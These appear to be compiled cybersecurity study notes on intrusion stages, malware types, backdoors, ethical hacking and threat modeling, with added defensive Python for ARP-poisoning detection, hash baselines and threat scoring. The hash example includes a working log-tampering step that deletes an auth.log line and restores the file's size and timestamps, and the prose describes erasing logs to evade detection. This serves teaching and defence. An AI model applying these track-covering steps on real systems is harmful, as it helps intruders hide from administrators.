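One concrete form of the "continuously monitoring the network" measure in the last bullet is watching ARP traffic for the poisoning described earlier: an IP address whose MAC binding suddenly changes, or one MAC answering for several IPs. The following is an added example, not code from the original notes or from the cited articles; the ARP replies it processes are constructed sample data, and on a real network you would feed it frames from a packet capture or snapshots of hosts' ARP caches.

```python
"""Detecting ARP poisoning from observed ARP replies (added example, constructed data)."""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ArpReply:
    """The fields of an ARP reply that the check needs."""
    sender_ip: str
    sender_mac: str
    time: float  # seconds since capture start (constructed values below)


@dataclass
class ArpMonitor:
    """Keeps the first IP-to-MAC binding seen and flags later contradictions."""
    bindings: dict = field(default_factory=dict)                    # ip -> mac
    claims: dict = field(default_factory=lambda: defaultdict(set))  # mac -> {ip, ...}
    alerts: list = field(default_factory=list)

    def observe(self, reply: ArpReply):
        """Record one reply; return an alert dict if it contradicts the known binding."""
        mac = reply.sender_mac.lower()
        self.claims[mac].add(reply.sender_ip)
        known = self.bindings.get(reply.sender_ip)
        if known is None:
            # First time this IP is seen: trust it (in production, seed bindings
            # from a known-good inventory instead of trusting the first reply).
            self.bindings[reply.sender_ip] = mac
            return None
        if known != mac:
            alert = {"ip": reply.sender_ip, "old_mac": known, "new_mac": mac, "time": reply.time}
            self.alerts.append(alert)
            return alert
        return None

    def macs_claiming_multiple_ips(self):
        """A poisoner answering for both the gateway and a victim shows up here."""
        return {mac: sorted(ips) for mac, ips in self.claims.items() if len(ips) > 1}


def run_monitor(replies):
    """Feed a sequence of replies through a fresh monitor and return it."""
    monitor = ArpMonitor()
    for reply in replies:
        monitor.observe(reply)
    return monitor


# Constructed capture: the gateway and two hosts answer normally, then a third
# MAC starts answering for both the gateway and host .20.
SAMPLE_REPLIES = [
    ArpReply("192.168.1.1", "aa:bb:cc:00:00:01", 0.0),   # gateway
    ArpReply("192.168.1.20", "aa:bb:cc:00:00:14", 1.0),  # host
    ArpReply("192.168.1.1", "DE:AD:BE:EF:00:01", 5.0),   # contradicts the gateway binding
    ArpReply("192.168.1.20", "de:ad:be:ef:00:01", 5.1),  # contradicts the host binding
    ArpReply("192.168.1.30", "aa:bb:cc:00:00:1e", 6.0),  # unrelated host, no alert
]

if __name__ == "__main__":
    mon = run_monitor(SAMPLE_REPLIES)
    for alert in mon.alerts:
        print("ARP binding changed:", alert)
    print("MACs answering for several IPs:", mon.macs_claiming_multiple_ips())
```

A binding change also happens legitimately when a DHCP lease moves or a network card is replaced, so treat an alert as a prompt to verify the MAC against the device inventory rather than as proof of an attack.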

Hackers and Cyber Crimes, Part 2

Gaining Access
The gaining access attack is the second part of network penetration testing. In this section, we will connect to the network. This will allow us to launch more powerful attacks and get more accurate information. If a network doesn't use encryption, we can just connect to it and sniff out unencrypted data. If a network is wired, we can use a cable and connect to it, perhaps after changing our MAC address. The only problem is when the target uses encryption like WEP, WPA, or WPA2. If we do encounter encrypted data, we need to know the key to decrypt it; that is the main purpose of this chapter.

If the network uses encryption, we can't get anywhere unless we decrypt it. In this section, we will discuss how to break that encryption and how to gain access to networks whether they use WEP, WPA, or WPA2.

What is a Privilege Escalation Attack?

A privilege escalation attack is a cyberattack to gain illicit access to elevated rights, permissions, entitlements, or privileges beyond what is assigned to an identity, account, user, or machine. This attack can involve an external threat actor or an insider threat. Privilege escalation is a key stage of the cyberattack chain and typically involves the exploitation of a privilege escalation vulnerability, such as a system bug, misconfiguration, or inadequate access controls.
In this blog, I will explain how privilege escalation works, the key
attack vectors involved with privilege escalation, and the critical
privileged access security controls you can implement to prevent or
mitigate it.

How does Privilege Escalation Work?

Every local interactive session or remote access session represents some form of privileged access, regardless of whether it is executed by a human or a machine. This encompasses everything from guest privileges allowing local logon only, to administrator or root privileges for a remote session and potentially complete system control. Therefore, every account that interacts with a system has some privileges assigned.
A standard user account rarely has rights to a database, sensitive
files, or anything of value. So, how does a threat actor navigate an
environment and gain administrator or root privileges to exploit
them as an attack vector? There are five primary methods:
1. Credential exploitation
2. Vulnerabilities and exploits
3. Misconfigurations
4. Malware
5. Social engineering
The attack chain diagram below shows the primary techniques used
by a threat actor, regardless of whether an insider or external threat,
to begin their mission and propagate through an environment.

Executing Applications in cyber security

Top 10 Important Applications of CyberSecurity

Cybersecurity threats change over time, and it is important for organizations to counter these threats. Intruders adjust by creating new tools and tactics to undermine security when new protections are developed to counter more recent attacks. Your organization's cybersecurity is only as strong as its weakest link. To safeguard your data and systems, it's crucial to have a collection of cybersecurity tools and techniques at your disposal. Below are a few important applications of cybersecurity:

1. Network Security Surveillance

Continuous network monitoring is the practice of looking for indications of harmful or intrusive behavior. It is often used in conjunction with other security tools like firewalls, antivirus software, and IDPS. Monitoring for network security may be done manually or automatically using software.

2. Identification And Access Control (IAM)

The management has control over which individual can access which sections of the
data. Usually, the management regulates who has access to data, networks, and
computer systems. Here is where cybersecurity comes into the picture by
identifying users and executing an access control. Various cyber security
applications ensure IAM across an organization. IAM may be implemented in both
software and hardware, and it often makes use of role-based access control (RBAC)
to limit access to certain system components.

Managers can manage who has access to what, when they can access it, and for how
long, thanks to solution providers like Okta.

3. Software Security

Applications that are crucial to company operations are protected by application security. It includes controls like code signing and application whitelisting, and it may help unify your security rules with things like file-sharing rights and multi-factor authentication. With the application of AI in cyber security, software security is bound to improve.

4. Risk Management

Risk management, data integrity, security awareness training, and risk analysis are
all covered by cyber security. The evaluation of risks and the control of the harm
that may be done as a result of these risks are important components of risk
management. The security of sensitive information is another issue covered by
data security.

5. Planning for disaster recovery and business continuity

Data recovery enables organizations to continue working in the event of data loss, attacks, or disasters. By backing up data regularly and investing in a system that enables corporate activities to continue, this application offers models or techniques that may help firms cope with severe data loss. Thus, this application of cybersecurity ensures business continuity.

6. Physical Security

System locks, intrusion detection systems, alarms, surveillance systems, and data-
destruction systems are a few examples of physical security measures. These allow
organizations to secure their IT infrastructure.

7. Compliance And Investigations

Cybersecurity is helpful during the examination of suspicious situations. Additionally, it helps organizations maintain and adhere to regulations.

8. Security During Software Development

The software aids in detecting software flaws when they are being developed and
ensuring that regulations and standards are followed. Cybersecurity tools
thoroughly test, scan, and analyze the software to identify any bugs, openings, or
weaknesses that hackers or competing businesses might exploit.

9. Security Against DDoS

Cybersecurity aids in providing a mitigation solution to deal with DDoS. It redirects traffic to other cloud-based servers and resolves the issue.

10. Protecting Critical Systems

Cybersecurity aids in preventing attacks on large servers linked to wide-area networks. It upholds strict, industry-standard safety standards that users must follow to secure their devices. It keeps track of all apps in real time and routinely evaluates network security, servers, and the users themselves.

Covering Tracks

Earlier we saw how an attacker hides malicious files on a target computer using various steganographic techniques, NTFS streams, and other methods in order to keep up future access to the target. Once the attacker has succeeded in performing this malicious operation, the next step is to get rid of any resulting traces or tracks within the system. Covering tracks is one of the main stages of system hacking. In this stage, the attacker tries to hide and avoid being detected, or "traced out," by covering all "tracks," or logs, generated while gaining access to the target network or computer. Let us see how the attacker removes traces of an attack from the target computer.

Erasing evidence is a requirement for an attacker who wants to remain obscure; it is one method of evading a traceback. This starts with erasing the contaminated logs and any error messages generated during the attack. Then the attacker changes the system configuration so that it does not log future activities. By manipulating and tweaking the event logs, attackers trick the administrator into believing that there is no malicious activity on the system and that no intrusion or compromise has actually taken place.

Because the first thing an administrator does when monitoring for unusual activity is to check the system log files, it is common for intruders to use a utility to alter these logs. In some cases, rootkits can disable and discard all existing logs. Attackers who intend to use the system for an extended period as a launch base for further exploitation remove only those portions of the logs that would reveal their presence.

It is imperative for attackers to make the system appear as it did before access was gained and a backdoor was established. This leads them to change any file attributes back to their original state. Information listed, such as file size and date, is simply attribute information stored about the file.

Protecting against attackers who hide their tracks by changing file information is often difficult. However, it is possible to detect whether an attacker has done so by calculating the file's cryptographic hash. This sort of hash is a calculation over the whole file, taken before any encryption, so a change to the contents changes the hash even when the size and date look unchanged.

Attackers might not wish to delete a whole log to hide their tracks, as doing so may require admin privileges. If attackers are able to delete only the attack event logs, they may still be able to escape detection.
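The hash check described above, as an added example that is not part of the original notes: a SHA-256 baseline of every file under a directory is recorded, and a later snapshot is compared against it. The directory tree, the log lines and the "tampering" step that removes a line while restoring the file's size and timestamps are all constructed inside a temporary folder, so the example runs offline and shows why the hash catches what size and date do not.

```python
"""Detecting log tampering with a cryptographic hash baseline (added example)."""
import hashlib
import os
import tempfile
from pathlib import Path


def file_digest(path: Path) -> str:
    """SHA-256 of the file contents, read in chunks so large logs do not fill memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each regular file (path relative to root) to its digest."""
    return {
        p.relative_to(root).as_posix(): file_digest(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(baseline: dict, current: dict) -> dict:
    """Report files whose contents changed, disappeared, or appeared since the baseline."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "deleted": sorted(k for k in baseline if k not in current),
        "added": sorted(k for k in current if k not in baseline),
    }


def demo() -> dict:
    """Constructed scenario: one log line is removed, then size and mtime are put back."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        log = root / "var" / "log" / "auth.log"
        log.parent.mkdir(parents=True)
        lines = [  # constructed log lines, not from any real system
            "Mar 10 09:01:02 host sshd: Accepted password for alice\n",
            "Mar 10 09:03:44 host sshd: Accepted password for root from 10.0.0.9\n",
            "Mar 10 09:05:10 host sshd: Accepted password for bob\n",
        ]
        log.write_text("".join(lines))
        hosts = root / "etc" / "hosts"
        hosts.parent.mkdir(parents=True)
        hosts.write_text("127.0.0.1 localhost\n")

        before = log.stat()
        baseline = build_baseline(root)

        # The trick the text describes: drop the revealing line, pad the file back
        # to its original byte length, and restore the original timestamps.
        tampered = lines[0] + lines[2]
        tampered += " " * (before.st_size - len(tampered.encode()))
        log.write_text(tampered)
        os.utime(log, ns=(before.st_atime_ns, before.st_mtime_ns))
        after = log.stat()

        return {
            "size_unchanged": after.st_size == before.st_size,    # attribute check passes
            "mtime_unchanged": after.st_mtime_ns == before.st_mtime_ns,  # so does this one
            "diff": compare(baseline, build_baseline(root)),     # but the hash does not
        }


if __name__ == "__main__":
    print(demo())
```

Keep the baseline (or a signature over it) off the monitored host: an attacker who can rewrite the logs can otherwise rewrite the baseline too.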

Computer worm

What is a computer worm?

A computer worm is a type of malware whose primary function is to self-replicate and infect other computers while remaining active on infected systems.

A computer worm duplicates itself to spread to uninfected computers. It often does this by exploiting parts of an operating system that are automatic and invisible to the user.

Typically, a user only notices a worm when its uncontrolled replication consumes system resources and slows or halts other tasks. A computer worm is not to be confused with WORM, or write once, read many.

How do computer worms work?

Computer worms often rely on vulnerabilities in networking protocols, such as File Transfer Protocol, to propagate.

After a computer worm loads and begins running on a newly infected system,
it will typically follow its prime directive: to remain active on an infected
system for as long as possible and spread to as many other vulnerable
systems as possible.

Is a worm a virus?
No. A worm is not a virus, although like a virus, it can severely disrupt IT operations and cause
data loss. A worm is actually much more serious than a virus because once it infects a vulnerable
machine, it can “self-replicate” and spread automatically across multiple devices.

How do worms infect computers?

Software vulnerabilities provide a path for worms to infect machines. Spam email or instant message (IM) attachments are also a delivery method. The messages use social engineering to get users to think the malicious files are safe to open. Removable drives, like USB drives, can also deliver worms.

How do worms spread?

Worms self-replicate automatically. They spread by using automatic file sending and receiving features that have been enabled, intentionally or not, on network computers. Once a worm has infected a computer, it installs itself in the device's memory and can then transfer itself to other machines.

The 3 stages of a worm attack

Step 1: Enabling vulnerability
The initial phase of a worm attack occurs when the worm is first installed on a vulnerable machine. The worm may have been transmitted through a software vulnerability. Or, it may have arrived through a malicious email or IM attachment or a compromised removable drive.

Step 2: Automatic replication
Once a worm is installed on a vulnerable device or system, it begins to self-replicate automatically. Through propagation, the worm makes its way to other new targets in the network—consuming bandwidth and hard-drive space and undermining device and system performance as it spreads.

Step 3: Payload delivery
In the last stage of a worm attack, the malicious actor behind the campaign tries to increase their level of access to the targeted system. Over time, they could gain access rights equivalent to those of a system administrator. From there, the adversary can cause significant damage, including data theft, and potentially gain access to multiple systems.

What is a Trojan Horse? (Trojan Malware)

A Trojan Horse (Trojan) is a type of malware that disguises itself as legitimate code or
software. Once inside the network, attackers are able to carry out any action that a
legitimate user could perform, such as exporting files, modifying data, deleting files or
otherwise altering the contents of the device. Trojans may be packaged in downloads for
games, tools, apps or even software patches. Many Trojan attacks also leverage social
engineering tactics, as well as spoofing and phishing, to prompt the desired action in the
user.

Trojan: Virus or Malware?

A Trojan is sometimes called a Trojan virus or Trojan horse virus, but those terms are
technically incorrect. Unlike a virus or worm, Trojan malware cannot replicate itself or self-
execute. It requires specific and deliberate action from the user.

Trojans are malware, and like most forms of malware, Trojans are designed to damage files,
redirect internet traffic, monitor the user’s activity, steal sensitive data or set up backdoor
access points to the system. Trojans may delete, block, modify, leak or copy data, which can
then be sold back to the user for ransom or on the dark web.

Viruses in cyber security

Definitions:
A computer program that can copy itself and infect a computer without permission or knowledge of the user. A virus might corrupt or delete data on a computer, use e-mail programs to spread itself to other computers, or even erase everything on a hard disk. See malicious code.

Computer Virus Definition

Chances are you've heard how important it is to keep viruses out, but what is a computer virus exactly? A computer virus is a type of malicious software, or malware, that spreads between computers and causes damage to data and software.

Computer viruses aim to disrupt systems, cause major operational issues, and result in data
loss and leakage. A key thing to know about computer viruses is that they are designed to
spread across programs and systems. Computer viruses typically attach to an executable host
file, which results in their viral codes executing when a file is opened. The code then spreads
from the document or software it is attached to via networks, drives, file-sharing programs,
or infected email attachments.

Common Signs of Computer Viruses

A computer virus will more than likely have an adverse effect on the device it resides on and may be discoverable through common signs of performance loss, including:

Speed of System

A computer system running slower than usual is one of the most common signs that the
device has a virus. This includes the system itself running slowly, as well as applications and
internet speed suffering. If a computer does not have powerful applications or programs
installed and is running slowly, then it may be a sign it is infected with a virus.

Pop-up Windows

Unwanted pop-up windows appearing on a computer or in a web browser are a telltale sign
of a computer virus. Unwanted pop-ups are a sign of malware, viruses, or spyware affecting
a device.

Programs Self-executing

If computer programs unexpectedly close by themselves, then it is highly likely that the software has been infected with some form of virus or malware. Another indicator of a virus is when applications fail to load when selected from the Start menu or their desktop icon. Every time that happens, your next step should be to perform a virus scan and remove any files or programs that might not be safe to use.

Accounts Being Logged Out

Some viruses are designed to affect specific applications, which will either cause them to
crash or force the user to automatically log out of the service.

Crashing of the Device

System crashes and the computer itself unexpectedly closing down are common indicators of
a virus. Computer viruses cause computers to act in a variety of strange ways, which may
include opening files by themselves, displaying unusual error messages, or clicking keys at
random.

Mass Emails Being Sent from Your Email Account

Computer viruses are commonly spread via email. Hackers can use other people's email
accounts to spread malware and carry out wider cyberattacks. Therefore, if an email account
has sent emails in the outbox that a user did not send, then this could be a sign of a computer
virus.

Changes to Your Homepage

Any unexpected changes to a computer—such as your system's homepage being amended or any browser settings being updated—are signs that a computer virus may be present on the device.

What is a Backdoor Attack?

In cybersecurity, a backdoor is a means of bypassing an organization's existing security systems. While a company may have various security solutions in place, there may be mechanisms in place that allow a legitimate user or attacker to evade them. If an attacker can identify and access these backdoors, they can gain access to corporate systems without detection.

How Does a Backdoor Work?

Every computer system has an official means by which users are supposed to access it. Often, this includes an authentication system where the user provides a password or other type of credential to demonstrate their identity. If the user successfully authenticates, they are granted access to the system with their permissions limited to those assigned to their particular account.

While this authentication system provides security, it can also be inconvenient for some users, both legitimate and illegitimate. A system administrator may need to gain remote access to a system that is not designed to allow it. An attacker may want to access a company's database server despite lacking the credentials to do so. The manufacturer of a system may include a default account to simplify configuration, testing, and deployment of updates to a system.

In these cases, a backdoor may be inserted into a system. For example, a system administrator may set up a web shell on a server. When they want to access the server, they visit the appropriate site and can send commands directly to the server without needing to authenticate or configure corporate security policies to accept a secure remote access protocol like SSH.

How is a Backdoor Used by Hackers?

A backdoor provides access to a system that bypasses an organization's normal authentication mechanisms. Cybercriminals, who theoretically lack access to legitimate accounts on an organization's systems, can use it to remotely access corporate systems. With this remote access, they can steal sensitive data, deploy ransomware, spyware, or other malware, and take other malicious actions on the system.

Often, backdoors are used to provide an attacker with initial access to an organization's environment. If a system administrator or other legitimate user has created a backdoor on the system, an attacker that discovers this backdoor may use it for their own purposes. Alternatively, if an attacker identifies a vulnerability that would allow them to deploy their own backdoor on a system, then they can use the backdoor to expand their access and capabilities on the system.

Types of Backdoors

Backdoors can come in various different forms. A few of the most common
types include:

• Trojans: Most backdoor malware is designed to slip past an organization's defenses, providing an attacker with a foothold on a company's systems. For this reason, they are commonly trojans, which pretend to be a benign or desirable file while containing malicious functionality, such as supporting remote access to an infected computer.

• Built-in Backdoors: Device manufacturers may include backdoors in the form of default accounts, undocumented remote access systems, and similar features. While these systems are typically only intended for the use of the manufacturer, they are often designed to be impossible to disable, and no backdoor remains secret forever, exposing these security holes to attackers.

• Web Shells: A web shell is a web page designed to take user input and execute it within the system terminal. These backdoors are commonly installed by system and network administrators to make it easier to remotely access and manage corporate systems.

• Supply Chain Exploits: Web applications and other software often incorporate third-party libraries and code. An attacker may incorporate backdoor code into a library in the hope that it will be used in corporate applications, providing backdoor access to systems running the software.

Ethical Hacking and Social Engineering

Definition
Ethical hacking involves an authorized attempt to gain unauthorized access to
a computer system, application, or data. Carrying out an ethical hack involves
duplicating strategies and actions of malicious attackers. This practice helps
to identify security vulnerabilities which can then be resolved before a
malicious attacker has the opportunity to exploit them.

What is an ethical hacker?

Also known as "white hats," ethical hackers are security experts that perform these security assessments. The proactive work they do helps to improve an organization's security posture. With prior approval from the organization or owner of the IT asset, the mission of ethical hacking is the opposite of malicious hacking.

What are the key concepts of ethical hacking?

Hacking experts follow four key protocol concepts:

1. Stay legal. Obtain proper approval before accessing and performing a security assessment.
2. Define the scope. Determine the scope of the assessment so that the
ethical hacker’s work remains legal and within the organization’s
approved boundaries.
3. Report vulnerabilities. Notify the organization of all vulnerabilities
discovered during the assessment. Provide remediation advice for
resolving these vulnerabilities.
4. Respect data sensitivity. Depending on the data sensitivity, ethical
hackers may have to agree to a non-disclosure agreement, in addition to
other terms and conditions required by the assessed organization.

How are ethical hackers different from malicious hackers?

Ethical hackers use their knowledge to secure and improve the technology of
organizations. They provide an essential service to these organizations by
looking for vulnerabilities that can lead to a security breach.
An ethical hacker reports the identified vulnerabilities to the organization.
Additionally, they provide remediation advice. In many cases, with the
organization’s consent, the ethical hacker performs a re-test to ensure the
vulnerabilities are fully resolved.
Malicious hackers intend to gain unauthorized access to a resource (the more sensitive the better) for financial gain or personal recognition. Some malicious hackers deface websites or crash backend servers for fun, reputation damage, or to cause financial loss. The methods used and vulnerabilities found remain unreported. They aren't concerned with improving the organization's security posture.

What are some limitations of ethical hacking?

• Limited scope. Ethical hackers cannot progress beyond a defined
scope to make an attack successful. However, it’s not unreasonable to
discuss out of scope attack potential with the organization.
• Resource constraints. Malicious hackers don’t have time constraints
that ethical hackers often face. Computing power and budget are
additional constraints of ethical hackers.
• Restricted methods. Some organizations ask experts to avoid test
cases that lead the servers to crash (e.g., Denial of Service (DoS)
attacks).

Attack Vector

Definition
An attack vector is a pathway or method used by a hacker to illegally access a network or
computer in an attempt to exploit system vulnerabilities. Hackers use numerous attack
vectors to launch attacks that take advantage of system weaknesses, cause a data breach, or
steal login credentials. Such methods include sharing malware and viruses, malicious email
attachments and web links, pop-up windows, and instant messages that involve the attacker
duping an employee or individual user.

Many attacks launched through these vectors are financially motivated, with attackers stealing
money from people and organizations, or stealing data and personally identifiable information
(PII) to then hold the owner to ransom. The types of hackers that infiltrate a network are
wide-ranging. They could be disgruntled former employees, politically motivated organized
groups, hacktivists, professional hacking groups, or state-sponsored groups.

The Difference Between an Attack Vector and an Attack Surface

Cybersecurity attacks are launched using an attack vector. This could be through malware or
a phishing attack, which aims to steal user credentials and gain unauthorized access to
corporate data or resources. Social engineering is another way to launch an attack.

The attack surface is the total network area an attacker can use to launch cyber attack vectors
and extract data or gain access to an organization’s systems. Devices and people are part of
an organization’s attack surface because their vulnerabilities, such as weak passwords or
unpatched software, can be exploited by an attacker.

Information assurance

Information assurance (IA) is the practice of assuring information and managing risks related to
the use, processing, storage, and transmission of information. Information assurance includes
protection of the integrity, availability, authenticity, non-repudiation and confidentiality of user data. IA
encompasses both digital protections and physical techniques. These methods apply to data in
transit, both physical and electronic forms, as well as data at rest. IA is best thought of as a superset
of information security (i.e. umbrella term), and as the business outcome of information risk
management.

Information assurance (IA) is the process of processing, storing, and transmitting the right
information to the right people at the right time. IA relates to the business level and strategic risk
management of information and related systems, rather than the creation and application of
security controls. IA is used to benefit business through the use of information risk management,
trust management, resilience, appropriate architecture, system safety, and security, which
increases the utility of information to only their authorized users.

Pillars of Information assurance

Information assurance is built on five pillars: availability, integrity, authentication,
confidentiality and non-repudiation. These pillars are taken into account to protect systems while
still allowing them to efficiently provide services. However, these pillars do not act
independently from one another; rather, each can interfere with the goals of the others. These
pillars of information assurance have gradually come to be referred to as the pillars of
cyber security. As an administrator it is important to emphasize the pillars needed to
achieve the desired result for the information system, balancing the aspects of
service and privacy.

Authentication

Authentication refers to the verification of the validity of a transmission, originator, or process
within an information system. Authentication provides the recipient confidence in the data
sender's validity as well as the validity of their message. There exist many ways to bolster
authentication; they mainly break down into three categories: personally identifiable information
such as a person's name, address or telephone number; possession of a key token; or known
information, such as passwords.

Integrity

Integrity refers to the protection of information from unauthorized alteration. The goal of
information integrity is to ensure data is accurate throughout its entire lifespan. User
authentication is a critical enabler for information integrity. Information integrity is a function of
the number of degrees of trust existing between the ends of an information exchange. One way
information integrity risk is mitigated is through the use of redundant chip and software designs.
A failure of authentication could pose a risk to information integrity as it would allow an
unauthorized party to alter content. For example, if a hospital has inadequate password policies,
an unauthorized user could gain access to an information system governing the delivery of
medication to patients and risk altering the treatment course to the detriment of a particular
patient.

Availability

The pillar of availability refers to the preservation of data so that it can be retrieved or modified
by authorized individuals. Higher availability is preserved through an increase in storage system or
channel reliability.[8] Breaches in information availability can result from power outages,
hardware failures, DDoS attacks, etc. The goal of high availability is to preserve access to
information. Availability of information can be bolstered by the use of backup power, spare data
channels, off-site capabilities and continuous signal.

Confidentiality

Confidentiality is in essence the opposite of integrity. Confidentiality is a security measure
which controls who is able to access the data, which is done by shielding who has access
to the information. This is different from integrity, as integrity is shielding who can change the
information. Confidentiality is often ensured with the use of cryptography and steganography of
data. Confidentiality can be seen in the classification of information and in information
superiority in international operations such as NATO. Information assurance confidentiality in
the United States must follow HIPAA and healthcare provider security policies, information
labeling and need-to-know regulations to ensure nondisclosure of information.

Non-repudiation

Non-repudiation is the integrity of the data to be true to its origin, which prevents possible denial
that an action occurred. Increasing non-repudiation makes it more difficult to deny that the
information comes from a certain source. In other words, it makes it so that one cannot dispute
the source or authenticity of data. Attacks on non-repudiation typically involve degrading data
integrity while that data is in transit, usually through a man-in-the-middle attack or phishing.

Threat Modeling

Definition
Threat modeling is a structured process with these objectives: identify security
requirements, pinpoint security threats and potential vulnerabilities, quantify threat
and vulnerability criticality, and prioritize remediation methods.
Threat modeling methods create these artifacts:

• An abstraction of the system
• Profiles of potential attackers, including their goals and methods
• A catalog of threats that could arise

How does threat modeling work?
Threat modeling works by identifying the types of threat agents that cause
harm to an application or computer system. It adopts the perspective of
malicious hackers to see how much damage they could do. When conducting
threat modeling, organizations perform a thorough analysis of the software
architecture, business context, and other artifacts (e.g., functional
specifications, user documentation). This process enables a deeper
understanding and discovery of important aspects of the system. Typically,
organizations conduct threat modeling during the design stage (but it can
occur at other stages) of a new application to help developers find
vulnerabilities and become aware of the security implications of their design,
code, and configuration decisions. Generally, developers perform threat
modeling in four steps:

• Diagram. What are we building?
• Identify threats. What could go wrong?
• Mitigate. What are we doing to defend against threats?
• Validate. Have we acted on each of the previous steps?
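The four steps above carried through in code, as an added example that is not part of the notes: a small constructed web shop is diagrammed as components and data flows, threats are derived from the properties of each flow, each threat is given a mitigation, and validation checks that nothing in the catalog was left unaddressed. The component names, the STRIDE-style category names and the 1-5 impact and likelihood scores are assumptions made for the example.

```python
"""Four-step threat model (diagram, identify, mitigate, validate) run over a
small constructed web shop. Component names, the STRIDE-style category names
and the 1-5 impact/likelihood scores are assumptions for this example."""
from dataclasses import dataclass

@dataclass(frozen=True)
class Component:
    name: str
    trust: int  # 0 = untrusted internet, 1 = DMZ, 2 = internal network

@dataclass(frozen=True)
class Flow:  # one arrow on the data-flow diagram, plus what the rules inspect
    src: Component
    dst: Component
    data: str
    encrypted: bool      # protected in transit (e.g. TLS)
    authenticated: bool  # destination verifies who the sender is
    logged: bool         # an audit record of the exchange is kept
    rate_limited: bool   # abuse of the receiving endpoint is throttled

@dataclass
class Threat:
    flow: Flow
    category: str
    description: str
    impact: int       # 1 (negligible) .. 5 (severe)
    likelihood: int   # 1 (rare) .. 5 (expected)
    mitigation: str = ""

    @property
    def criticality(self) -> int:
        return self.impact * self.likelihood

# Step 1 - Diagram: what are we building?
browser = Component("Browser", trust=0)
api = Component("Web API", trust=1)
db = Component("Order DB", trust=2)
FLOWS = [
    Flow(browser, api, "login credentials", encrypted=True, authenticated=True, logged=True, rate_limited=False),
    Flow(api, db, "order records", encrypted=False, authenticated=True, logged=False, rate_limited=True),
    Flow(browser, api, "search query", encrypted=True, authenticated=False, logged=True, rate_limited=True),
]

# Step 2 - Identify threats: what could go wrong?
def identify_threats(flows):
    threats = []
    for f in flows:
        crosses = f.src.trust != f.dst.trust
        sensitive = any(w in f.data for w in ("credential", "record"))
        exposure = 4 if 0 in (f.src.trust, f.dst.trust) else 2  # internet-facing flows are probed more
        if crosses and not f.encrypted:
            threats.append(Threat(f, "Information disclosure", f"{f.data} cross a trust boundary in the clear", 5 if sensitive else 2, exposure))
            threats.append(Threat(f, "Tampering", f"{f.data} can be altered in transit", 4, exposure))
        if crosses and not f.authenticated:
            threats.append(Threat(f, "Spoofing", f"{f.dst.name} cannot tell who sent the {f.data}", 4 if sensitive else 2, exposure))
        if not f.logged:
            threats.append(Threat(f, "Repudiation", f"no audit trail for {f.data}", 3, 3))
        if f.src.trust == 0 and not f.rate_limited:
            threats.append(Threat(f, "Denial of service", f"{f.dst.name} can be flooded with {f.data}", 3, 4))
    return threats

# Step 3 - Mitigate: what are we doing to defend against each threat?
MITIGATIONS = {
    "Spoofing": "authenticate the caller (session token or mTLS)",
    "Tampering": "TLS, or a MAC over the payload",
    "Repudiation": "append-only audit log of the exchange",
    "Information disclosure": "encrypt the channel (TLS) between the components",
    "Denial of service": "rate limiting and lockout thresholds on the endpoint",
}

def mitigate(threats):
    for t in threats:
        t.mitigation = MITIGATIONS.get(t.category, "")

# Step 4 - Validate: has every identified threat been acted on?
def validate(threats):
    """Return the threats that still lack a mitigation; an empty list passes."""
    return [t for t in threats if not t.mitigation]

def prioritize(threats):
    """Order the catalog so remediation starts with the highest criticality."""
    return sorted(threats, key=lambda t: t.criticality, reverse=True)

if __name__ == "__main__":
    catalog = identify_threats(FLOWS)
    mitigate(catalog)
    for t in prioritize(catalog):
        print(f"[{t.criticality:2}] {t.category:<22} {t.description} -> {t.mitigation}")
    print("validation:", "PASS" if not validate(catalog) else "GAPS")
```

Note that the highest-ranked threat is the un-throttled login endpoint, not the plaintext internal database link: scoring by impact and likelihood, rather than by how alarming a finding sounds, is what lets the model justify where effort goes first.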
Advantages of threat modeling
When performed correctly, threat modeling can provide a clear line of sight
across a software project, helping to justify security efforts. The threat
modeling process helps an organization document knowable security threats
to an application and make rational decisions about how to address them.
Otherwise, decision-makers could act rashly based on scant or no supporting
evidence.
Overall, a well-documented threat model provides assurances that are useful
in explaining and defending the security posture of an application or
computer system. And when the development organization is serious about
security, threat modeling is the most effective way to do the following:

• Detect problems early in the software development life cycle
(SDLC)—even before coding begins.
• Spot design flaws that traditional testing methods and code reviews
may overlook.
• Evaluate new forms of attack that you might not otherwise consider.
• Maximize testing budgets by helping target testing and code review.
• Identify security requirements.
• Remediate problems before software release and prevent costly
recoding post-deployment.
• Think about threats beyond standard attacks to the security issues
unique to your application.
• Keep frameworks ahead of the internal and external attackers relevant
to your applications.
• Highlight assets, threat agents, and controls to deduce components that
attackers will target.
• Model the location of threat agents, motivations, skills, and capabilities
to locate potential attackers in relation to the system architecture.

Misconceptions of threat modeling
As a security process, threat modeling is subject to several misconceptions.
Some people believe threat modeling is only a design-stage activity, some see
it as an optional exercise for which penetration testing or code review can
substitute, and some think the process is simply too complicated. The
following should help dispel some of these misconceptions:
Penetration testing and code reviews can’t substitute for threat
modeling. Penetration testing and secure code review are two activities that
are effective for finding bugs in code. However, security assessments (e.g.,
threat modeling) are better at uncovering design flaws.
There’s a good reason to conduct a threat model after
deployment. Understanding the issues in the current deployment influences
future security architecture strategy, and monitoring weaknesses allows for
faster and more effective remediation. Without understanding the potential
threats an application faces, you can’t ensure that you’re addressing all risks.
Threat modeling isn’t that complicated. Many developers are intimidated
by the idea of threat modeling. At first glance, it can seem daunting.
However, if you break up the tasks into workable steps, performing a threat
model on a simple web application—or even a complex architecture—
becomes systematic. The key is to start with basic best practices.

Enterprise Information Security Architecture

Information Security Architecture
Enterprise Information Security Architecture is a set of requirements, processes, principles,
and models that determine the current and/or future structure and behaviour of an
organization’s security processes, information security systems, personnel, and
organizational sub-units. It ensures that the security architecture and controls are in
alignment with the organization’s core goals and strategic direction. Though
Enterprise Information Security Architecture deals with information security, it relates more
broadly to the security practice of business optimization. Thus, it also
addresses business security architecture, performance management and security process
architecture. The main objective of implementing EISA is to make sure that IT security is in
alignment with business strategy.

Enterprises are struggling nowadays to achieve a balance between implementing
security controls in the enterprise and allowing employees to increase their
productivity and communicate information easily. Enterprise security is not only about
protecting the infrastructure of the enterprise, but also the sensitive data flowing within the
organization. Enterprise security is generally achieved in three ways [1, 2]:
